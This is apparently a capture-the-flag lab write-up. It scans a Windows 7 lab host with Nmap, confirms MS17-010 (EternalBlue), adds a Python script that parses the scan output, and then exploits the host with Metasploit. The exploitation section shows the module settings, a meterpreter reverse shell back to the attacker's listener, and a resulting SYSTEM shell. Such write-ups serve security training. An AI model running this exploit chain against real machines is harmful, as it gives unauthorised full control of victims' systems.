Blue
Scanning
# Nmap 7.94SVN scan initiated Fri Mar 14 20:07:43 2025 as: nmap -sC -sV -oN nmap 10.10.22.152
Nmap scan report for 10.10.22.152
Host is up (0.033s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: JON-PC
| NetBIOS_Domain_Name: JON-PC
| NetBIOS_Computer_Name: JON-PC
| DNS_Domain_Name: Jon-PC
| DNS_Computer_Name: Jon-PC
| Product_Version: 6.1.7601
|_ System_Time: 2025-03-15T00:09:08+00:00
|_ssl-date: 2025-03-15T00:09:13+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2025-03-14T00:07:24
|_Not valid after: 2025-09-13T00:07:24
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:ea:88:94:7d:bf (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-03-15T00:09:08
|_ start_date: 2025-03-15T00:07:22
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-03-14T19:09:08-05:00
|_clock-skew: mean: 59m59s, deviation: 2h14m10s, median: 0s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 14 20:09:14 2025 -- 1 IP address (1 host up) scanned in 90.66 seconds
I have 9 open ports: 135 msrpc, 139 netbios-ssn, 445 microsoft-ds, 3389 ssl/ms-wbt-server?, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49158 msrpc, and 49159 msrpc. These ports are commonly found open on Windows systems.
Enumeration
From this Nmap scan I can see the operating system version, Windows 7 Professional Service Pack 1, and that SMB version 1 is in use. Several indicators in the scan point to SMBv1:
- Presence of ports 139 and 445
  - Port 139 (NetBIOS-SSN): used by SMB over NetBIOS, typically associated with SMBv1.
  - Port 445 (Microsoft-DS): used by SMB directly over TCP without NetBIOS.
- Lack of SMBv2 protocol details
  - The scan does not list SMBv2 explicitly. If SMBv2 or SMBv3 were enforced, you would see more details under smb2-security-mode and smb2-time.
- SMB message signing is disabled
  - message_signing: disabled appears in the smb-security-mode script output.
  - While message signing is optional in SMBv2, it is typically disabled in SMBv1 by default, making it a common indicator that SMBv1 is enabled.
- Windows version (Windows 7 SP1)
  - Windows 7 (especially without modern patches) still supports SMBv1 by default.
  - Since the scan identifies Windows 7 Professional 7601 Service Pack 1, SMBv1 is likely still enabled unless an administrator explicitly disabled it.
- No SMBv2 negotiation detected
  - The smb2-security-mode script output only shows:
    | smb2-security-mode:
    | 2:1:0:
    |_ Message signing enabled but not required
  - If SMBv1 were fully disabled, you would typically see more details about SMBv2/SMBv3 negotiation.
Taken together, these are the indications of an EternalBlue vulnerability. To confirm it, I run a vulnerability scan with Nmap:
nmap --script=*vuln* 10.10.22.152
Here *vuln* tells Nmap to run every script whose name contains the substring "vuln", so I don't have to list the scripts manually or run them one by one.
# Nmap 7.94SVN scan initiated Fri Mar 14 20:11:55 2025 as: nmap --script=*vuln* -oN vuln-scan 10.10.22.152
Nmap scan report for 10.10.22.152
Host is up (0.030s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
# Nmap done at Fri Mar 14 20:13:22 2025 -- 1 IP address (1 host up) scanned in 87.08 seconds
Nmap also confirms the presence of the EternalBlue vulnerability, which is tracked as MS17-010 or CVE-2017-0143.
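As an added example (my own code, not part of this writeup or of Nmap), a small Python triage script that reads Nmap text output and extracts the same evidence the Enumeration section reads by hand: the SMBv1 indicators from the -sC -sV run and the smb-vuln-ms17-010 verdict from the --script=*vuln* run. The sample text is a constructed condensation of the scan results shown above, and the function names are assumptions of mine.

```python
import re
# Constructed sample: lines condensed from the two Nmap runs shown in this writeup.
SERVICE_SCAN = """\
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
"""
VULN_SCAN = """\
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
"""

def smbv1_indicators(text):
    """The SMBv1 hints the Enumeration section reads off the -sC -sV output."""
    return {
        "port_445_open": bool(re.search(r"^445/tcp\s+open", text, re.M)),
        "smb1_signing_disabled": "message_signing: disabled" in text,
        "windows7_sp1": "Windows 7 Professional 7601 Service Pack 1" in text,
        "smb2_signing_not_required": "Message signing enabled but not required" in text,
    }

def ms17_010_result(text):
    """Parse the smb-vuln-ms17-010 block of a --script=*vuln* run.
    Returns (state, sorted CVE ids), or (None, []) if the script printed nothing."""
    lines = text.splitlines()
    block = []
    for i, line in enumerate(lines):
        if line.startswith("| smb-vuln-ms17-010:"):
            for sub in lines[i + 1:]:
                block.append(sub)
                if sub.startswith("|_"):  # Nmap marks a script's last output line with |_
                    break
            break
    body = "\n".join(block)
    state = re.search(r"State:\s*([A-Z ]+)", body)
    return (state.group(1).strip() if state else None), sorted(set(re.findall(r"CVE-\d{4}-\d+", body)))

def triage(service_scan, vuln_scan):
    """One verdict combining both scans: SMBv1 hints plus the MS17-010 script result."""
    ind = smbv1_indicators(service_scan)
    state, cves = ms17_010_result(vuln_scan)
    return {"indicator_count": sum(ind.values()), "ms17_010": state, "cves": cves, "confirmed": state == "VULNERABLE"}
```

Feed it the saved files from the two runs (the -oN outputs nmap and vuln-scan) and the indicator count tells you how strong the circumstantial evidence is, while "confirmed" reflects only the script's own verdict.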
Exploitation
To exploit this vulnerability I will use Metasploit (msfconsole) and search for EternalBlue.
$ msfconsole
Metasploit tip: View all productivity tips with the tips command
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
=[ metasploit v6.4.18-dev ]
+ -- --=[ 2437 exploits - 1255 auxiliary - 429 post ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search Eternal Blue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
28 \_ target: Execute payload (x64) . . . .
29 \_ target: Neutralize implant . . . .
Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'
msf6 >
Now I select the first exploit and hope it works; if it doesn't, I will try the others in turn. After choosing the exploit I have to check the available options and set the required ones.
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metaspl
oit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects
Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Wind
ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
ines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server
2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.232.74
RHOSTS => 10.10.232.74
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.21.112.161
LHOST => 10.21.112.161
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.232.74 yes The target host(s), see https://docs.metasploit.com/docs/using-metaspl
oit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects
Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Wind
ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
ines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server
2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.21.112.161 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) >
The only thing that remains now is to exploit it!
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.21.112.161:4444
[*] 10.10.232.74:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.232.74:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.232.74:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.232.74:445 - The target is vulnerable.
[*] 10.10.232.74:445 - Connecting to target for exploitation.
[+] 10.10.232.74:445 - Connection established for exploitation.
[+] 10.10.232.74:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.232.74:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.232.74:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.232.74:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.232.74:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.232.74:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.232.74:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.232.74:445 - Sending all but last fragment of exploit packet
[*] 10.10.232.74:445 - Starting non-paged pool grooming
[+] 10.10.232.74:445 - Sending SMBv2 buffers
[+] 10.10.232.74:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.232.74:445 - Sending final SMBv2 buffers.
[*] 10.10.232.74:445 - Sending last fragment of exploit packet!
[*] 10.10.232.74:445 - Receiving response from exploit packet
[+] 10.10.232.74:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.232.74:445 - Sending egg to corrupted connection.
[*] 10.10.232.74:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 10.10.232.74
[*] Meterpreter session 1 opened (10.21.112.161:4444 -> 10.10.232.74:49194) at 2025-03-17 19:25:08 -0400
[+] 10.10.232.74:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.232.74:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.232.74:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
To get a shell I can simply run the command shell.
meterpreter > shell
Process 1520 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
At this point, you can take the time needed to search the system for the flags.